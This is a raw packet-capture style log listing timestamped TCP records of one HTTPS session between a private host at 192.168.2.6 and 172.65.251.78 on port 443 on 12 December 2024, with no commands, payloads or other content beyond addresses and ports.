Dec 12, 2024 13:05:26.171072006 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:26.171089888 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:26.171163082 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:26.171169996 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:26.171226978 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:26.311433077 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:26.311459064 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:26.311530113 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:26.311554909 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:26.311575890 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:26.311600924 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:26.319205046 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:26.319230080 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:26.319294930 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:26.319329977 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:26.319375992 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:26.326210022 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:26.326231003 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:26.326298952 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:26.326323032 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:26.326373100 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:26.334307909 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:26.334331036 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:26.334381104 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:26.334403992 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:26.334427118 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:26.334444046 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:26.341538906 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:26.341566086 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:26.341610909 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:26.341634989 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:26.341654062 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:26.341676950 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:26.348680019 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:26.348697901 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:26.348767042 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:26.348790884 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:26.348834038 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:26.355488062 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:26.355508089 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:26.355557919 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:26.355580091 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:26.355607986 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:26.355624914 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:26.363114119 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:26.363127947 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:26.363197088 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:26.363209963 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:26.363251925 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:26.503541946 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:26.503570080 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:26.503668070 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:26.503696918 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:26.503739119 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:26.511173010 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:26.511189938 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:26.511250019 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:26.511255026 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:26.511298895 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:26.518292904 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:26.518313885 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:26.518388987 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:26.518395901 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:26.518450022 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:26.526156902 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:26.526186943 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:26.526254892 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:26.526262999 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:26.526300907 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:26.532742977 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:26.532773018 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:26.532820940 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:26.532833099 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:26.532855988 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:26.532870054 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:26.540515900 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:26.540534019 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:26.540605068 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:26.540625095 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:26.540662050 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:26.548078060 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:26.548098087 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:26.548166037 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:26.548182964 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:26.548226118 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:26.556562901 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:26.556593895 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:26.556685925 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:26.556695938 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:26.556730986 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:26.696319103 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:26.696356058 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:26.696424007 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:26.696448088 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:26.696460962 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:26.696492910 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:26.703442097 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:26.703470945 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:26.703528881 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:26.703535080 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:26.703571081 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:26.710771084 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:26.710793018 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:26.710860968 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:26.710870028 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:26.710913897 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:26.718205929 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:26.718229055 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:26.718296051 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:26.718302011 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:26.718346119 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:26.724927902 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:26.724952936 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:26.725028038 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:26.725054026 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:26.725095987 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:26.733264923 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:26.733289003 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:26.733378887 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:26.733392000 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:26.733458042 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:26.740248919 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:26.740279913 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:26.740375996 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:26.740384102 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:26.740456104 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:26.747992039 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:26.748018026 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:26.748229027 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:26.748239040 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:26.748276949 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:26.888510942 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:26.888544083 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:26.888715982 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:26.888746023 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:26.888822079 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:26.895284891 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:26.895307064 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:26.895397902 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:26.895420074 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:26.895620108 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:26.896410942 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:26.896472931 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:26.913997889 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:26.914019108 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:26.914138079 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:26.914167881 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:26.914217949 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:26.932112932 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:26.932130098 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:26.932229042 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:26.932239056 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:26.932281017 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:26.938395977 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:26.938422918 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:26.938483953 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:26.938504934 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:26.938519001 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:26.938548088 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:26.942549944 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:26.942634106 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:26.942646027 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:26.948127985 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:26.948184013 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:26.948218107 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:26.948235035 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:26.948282957 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:26.948328018 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:26.954859018 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:26.954889059 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:26.954969883 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:26.954996109 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:26.955041885 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:27.075491905 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:27.075520039 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:27.075690985 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:27.075717926 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:27.075762033 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:27.085946083 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:27.085968971 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:27.086066961 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:27.086088896 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:27.086133003 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:27.093683958 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:27.093702078 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:27.093769073 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:27.093791962 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:27.093832970 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:27.108342886 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:27.108378887 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:27.108489990 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:27.108510971 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:27.108556986 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:27.124757051 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:27.124783993 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:27.124897957 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:27.124919891 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:27.124977112 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:27.132426023 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:27.132447004 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:27.132569075 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:27.132586956 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:27.132622004 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:27.140047073 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:27.140072107 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:27.140146971 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:27.140162945 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:27.140197992 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:27.147780895 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:27.147804976 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:27.147875071 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:27.147887945 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:27.147923946 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:27.268438101 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:27.268462896 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:27.268516064 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:27.268544912 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:27.268562078 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:27.268591881 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:27.278570890 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:27.278587103 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:27.278637886 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:27.278645992 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:27.278676987 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:27.278693914 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:27.286278009 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:27.286299944 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:27.286380053 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:27.286389112 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:27.286422968 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:27.300309896 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:27.300331116 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:27.300394058 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:27.300424099 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:27.300440073 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:27.300726891 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:27.316756964 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:27.316782951 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:27.318030119 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:27.318053961 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:27.318103075 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:27.324492931 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:27.324511051 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:27.324564934 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:27.324573040 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:27.324606895 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:27.332515001 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:27.332540989 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:27.332583904 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:27.332590103 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:27.332613945 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:27.332639933 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:27.339850903 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:27.339875937 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:27.339965105 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:27.339973927 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:27.340015888 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:27.468715906 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:27.468749046 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:27.468858957 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:27.468894005 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:27.468935013 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:27.479068995 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:27.479093075 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:27.479198933 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:27.479219913 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:27.479264021 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:27.486831903 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:27.486850023 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:27.486928940 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:27.486936092 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:27.486968040 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:27.503448009 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:27.503468990 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:27.503583908 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:27.503595114 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:27.503644943 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:27.511218071 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:27.511239052 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:27.511353970 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:27.511363983 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:27.511408091 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:27.518105030 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:27.518124104 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:27.518186092 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:27.518194914 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:27.518232107 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:27.525542974 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:27.525559902 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:27.525608063 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:27.525616884 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:27.525671005 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:27.533320904 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:27.533344030 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:27.533458948 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:27.533467054 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:27.533505917 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:27.661156893 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:27.661185026 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:27.661330938 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:27.661367893 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:27.661407948 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:27.672333002 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:27.672353983 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:27.672441959 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:27.672450066 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:27.672487974 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:27.678817034 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:27.678837061 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:27.678929090 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:27.678939104 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:27.678972960 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:27.695334911 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:27.695353031 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:27.695429087 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:27.695437908 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:27.695476055 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:27.703250885 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:27.703268051 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:27.703373909 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:27.703381062 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:27.703418016 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:27.709934950 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:27.709950924 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:27.710016966 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:27.710022926 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:27.710057974 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:27.712088108 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:27.712150097 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:27.719769955 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:27.719788074 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:27.719891071 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:27.719897985 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:27.726516962 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:27.726541042 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:27.726717949 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:27.726725101 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:27.780754089 CET	49726	443	192.168.2.6	172.65.251.78
Dec 12, 2024 13:05:27.854742050 CET	443	49726	172.65.251.78	192.168.2.6
Dec 12, 2024 13:05:27.854768038 CET	443	49726	172.65.251.78	192.168.2.6
